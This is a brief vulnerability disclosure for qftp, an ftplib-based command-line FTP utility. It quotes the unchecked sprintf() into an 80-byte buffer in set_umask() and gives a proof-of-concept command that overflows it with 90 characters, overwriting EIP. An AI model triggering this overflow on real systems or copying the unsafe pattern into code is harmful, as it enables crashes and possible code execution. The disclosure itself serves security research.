http://nbpfaus.net/~pfau/ftplib/ qftp is a utility that performs file transfers using ftplib based on instructions presented on the command line. >> Description buffer overflow in sprintf(), set_umask don't check sizelen of passed argument. >> Source error in main(): 337: case 'm' : set_umask(optarg); break; .. void set_umask(char *m) { char buf[80]; sprintf(buf,"umask %s", m); ftp_connect(); FtpSite(buf, conn); } >> POC $ gcc ftplib.c getopt.c qftp.c -o ftpsend $ ftpsend localhost -l login -p passwd -m `perl -e "print 'a'x90"` Segmentation fault # eip addr: $1 = (void *) 0x61616161 -- ~ starcadi